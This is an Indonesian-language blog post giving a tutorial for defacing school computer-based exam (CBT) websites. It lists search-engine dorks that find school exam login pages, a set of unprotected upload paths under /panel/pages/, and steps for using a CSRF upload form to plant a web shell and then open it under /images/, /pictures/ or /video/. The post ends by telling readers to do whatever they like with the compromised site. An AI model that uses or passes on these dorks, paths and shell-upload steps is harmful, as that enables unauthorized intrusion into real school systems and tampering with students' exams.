Deface POC CBT

Assalamualaikum Brother... :v


Kali Ini gw akan Ngasih Tutor, Gimana sih cara Deface CBT atau bisa dibilang Computer Based Test.. Nahh nih gw kasih sedikit tutor buat kalian semua....
yang pertama siapin Dork

Dork :

inurl:/login.php intitle:ujian online
inurl:/cbt/login.php site:sch.id
inurl:/login.php intitle:cbt beesmart
inurl:/login.php inurl:/cbt
inurl:/login.php intitle:ujian sekolah
inurl:/login.php intitle:ujian sma
inurl:/login.php intitle:cbt pintersmart
inurl:/login.php intitle:ujian pintersmart

Exploit :

/panel/pages/upload-file.php
/panel/pages/upload_video.php
/panel/pages/upload_audio.php
/panel/pages/upload_gambar.php
/panel/pages/upload-file.php
/panel/pages/upload-fotosiswa.php
/panel/pages/upload-banner.php
/panel/pages/upload-logo.php

CSRF : Klik Disini 

Pertama kita dorking dulu...



Pilih Salah satu Target Yak...


 
Nahhh.... Tinggal tambahin Exploit ke website nya :v


Kalo Blank putih, Berarti VULN


Langsung Copy aja URL ke CSRF tadi, Untuk Post File kita Pilih uploadfile , uploadfile2 , uploadfile3 (pilih salah satu aja )


 kalo dah, Kunci Targetnya dan Pilih Shell kamu :v


 Kalo ada tilisan succes dipojok atas, itu berarti Sukses upload shell




Cara Panggil Shell kek gini,

 /images/namashell.php
 /pictures/namashell.php
/video/namashell.php

(tambahin dibelakang path) 


Nahh... Udahkan, terserah mau diapain...
oke Segini aja tutorialnya.. Kalo ada kesalahan, maaf. namanya juga manusia (banyak salah) :v

See You Next Time yaa Gaesss

Wassalamualaikum... 

Berlangganan update artikel terbaru via email:

1 Response to "Deface POC CBT"

  1. Logo configuration isn't simple in the event that you need something that emerges, exceptional and fascinating. As an entrepreneur, your need is to design the sort of logo you need for your business. logo design service

    ReplyDelete

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel